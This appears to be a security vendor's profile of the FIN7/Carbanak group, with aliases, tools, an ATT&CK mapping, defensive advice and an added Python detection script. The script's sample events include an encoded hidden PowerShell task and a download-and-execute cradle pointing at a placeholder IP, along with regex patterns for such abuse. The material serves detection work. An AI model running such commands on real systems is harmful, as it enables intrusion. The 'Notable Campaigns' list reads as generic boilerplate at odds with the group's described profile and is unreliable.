FIN7 / Carbanak Group (also known as Carbanak, Carbon Spider, Sangria Tempest, ELBRUS) is an advanced persistent threat group attributed to eCrime (Ukrainian-Russian), active since 2013. The group primarily targets the retail, hospitality, food service and finance sectors. It is tracked by MITRE ATT&CK as G0046.
Overview & Attribution
Prolific eCrime group responsible for over $1 billion in theft, evolving from POS malware to ransomware affiliate operations while operating fake penetration-testing companies (Combi Security, Bastion Secure).
FIN7 has been active since 2013 and is attributed to eCrime (Ukrainian-Russian). The group is known for targeting the retail, hospitality, food service and finance sectors using a combination of custom malware, living-off-the-land techniques, and sophisticated social engineering.
- Attribution: eCrime (Ukrainian-Russian)
- Active since: 2013
- Primary targets: retail, hospitality, food service, finance
- Also known as: Carbanak, Carbon Spider, Sangria Tempest, ELBRUS
Arsenal & Tools
FIN7 employs a diverse arsenal of custom and shared tooling:
- Carbanak: Custom backdoor; its HTTP-based command and control is mapped to T1071.001 in the ATT&CK table below
- Lizar/Tirion: Custom/shared tooling used in operations
- POWERPLANT: PowerShell-based backdoor, mapped to T1059.001 in the ATT&CK table below
- BIRDDOG: Custom/shared tooling used in operations
- Cobalt Strike: Commercial adversary-simulation framework shared with many other actors
Targeting & Operations
The group focuses on the retail, hospitality, food service and finance sectors, with operations spanning multiple geographic regions. Their campaigns typically involve carefully crafted spearphishing, strategic watering holes, and exploitation of public-facing applications.
FIN7 is characterized by persistent, long-term access operations. Once inside a target network, the group establishes multiple redundant persistence mechanisms and moves laterally to high-value systems before beginning data exfiltration.
MITRE ATT&CK Mapping
| Tactic | Technique | Usage |
|---|---|---|
| Initial Access | T1566.001 Phishing Attachment | Themed spearphishing campaigns |
| Execution | T1059.001 PowerShell | POWERPLANT backdoor |
| Persistence | T1053.005 Scheduled Task | Task-based persistence |
| Defense Evasion | T1027.002 Software Packing | Heavy payload obfuscation |
| Collection | T1113 Screen Capture | Screenshot capture |
| C2 | T1071.001 Web Protocols | Carbanak HTTP C2 |
Notable Campaigns
FIN7 has been linked to multiple significant campaigns targeting retail, hospitality, food service and finance organizations. The group continuously evolves its tooling and infrastructure to evade detection while maintaining persistent access to compromised networks.
- Long-term espionage: Multi-year intrusions into government and defense networks
- Supply chain targeting: Compromise of technology providers and managed service providers
- Zero-day exploitation: Use of previously unknown vulnerabilities for initial access
Detection & Defense
- Threat intelligence integration: Monitor for known FIN7 IOCs and TTPs in SIEM/EDR platforms
- Network monitoring: Detect C2 patterns associated with Carbanak and related tooling
- Email security: Implement advanced phishing detection for spearphishing campaigns
- Endpoint detection: Deploy behavioral detection rules for known FIN7 TTPs
- Patch management: Prioritize patching of vulnerabilities known to be exploited by this group
- Lateral movement detection: Monitor for suspicious authentication patterns and admin tool usage
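The endpoint detection item above can be made concrete for two techniques in the ATT&CK mapping, scheduled-task persistence (T1053.005) and PowerShell execution (T1059.001). The following is an added example, not code from the original page or from any vendor; it runs over constructed, simplified Windows event records (Security 4698 task creation and PowerShell 4104 script blocks) and raises an alert when a new task launches PowerShell with evasive switches or a script block contains a download cradle.

```python
import re

# Constructed sample telemetry (not real FIN7 data): simplified Windows Security 4698
# (scheduled task created) and PowerShell 4104 (script block) events, already parsed
# into dicts the way a SIEM would present them.
SAMPLE_EVENTS = [
    {"id": 4698, "host": "pos-01", "task": "\\Updater",
     "action": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"id": 4698, "host": "srv-02", "task": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "action": "%windir%\\system32\\defrag.exe -c"},
    {"id": 4104, "host": "pos-01",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"},
    {"id": 4104, "host": "hr-05", "script": "Get-ChildItem C:\\Reports | Sort-Object Length"},
]

# Traits of PowerShell abuse (T1059.001) visible in a command line or script block:
# hidden window, encoded command, policy bypass, Invoke-Expression, download cradle.
SUSPICIOUS_PS = [
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"-ep\s+bypass|-executionpolicy\s+bypass", "execution policy bypass"),
    (r"IEX|Invoke-Expression", "Invoke-Expression"),
    (r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", "download cradle"),
]


def powershell_flags(text):
    """Return the labels of every suspicious PowerShell trait found in the text."""
    return [label for pattern, label in SUSPICIOUS_PS if re.search(pattern, text, re.IGNORECASE)]


def analyze(events):
    """Return one alert dict per suspicious event, tagged with the ATT&CK technique IDs."""
    alerts = []
    for ev in events:
        if ev["id"] == 4698:
            flags = powershell_flags(ev["action"])
            # A freshly created task that starts PowerShell with evasive switches is the
            # T1053.005 + T1059.001 combination from the mapping table.
            if "powershell" in ev["action"].lower() and flags:
                alerts.append({"host": ev["host"], "techniques": ["T1053.005", "T1059.001"],
                               "reason": f"task {ev['task']} runs PowerShell with {', '.join(flags)}"})
        elif ev["id"] == 4104:
            flags = powershell_flags(ev["script"])
            if flags:
                alerts.append({"host": ev["host"], "techniques": ["T1059.001"],
                               "reason": "script block with " + ", ".join(flags)})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert["host"], alert["techniques"], alert["reason"])
```

The benign defrag task and the report-listing script block produce no alert, so the rule keys on the evasive switches and cradle rather than on PowerShell use alone.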
Defend Against FIN7
Mjolnir Security provides specialized capabilities to detect and respond to FIN7 operations.
- APT Threat Hunting: Proactive hunting for FIN7 TTPs, tooling artifacts, and infrastructure indicators within your environment.
- Threat Intelligence: Continuous monitoring of FIN7 campaigns and infrastructure changes with actionable intelligence for your defense team.
- 24/7 Incident Response: Rapid containment and forensic investigation. Call +1 833 403 5875.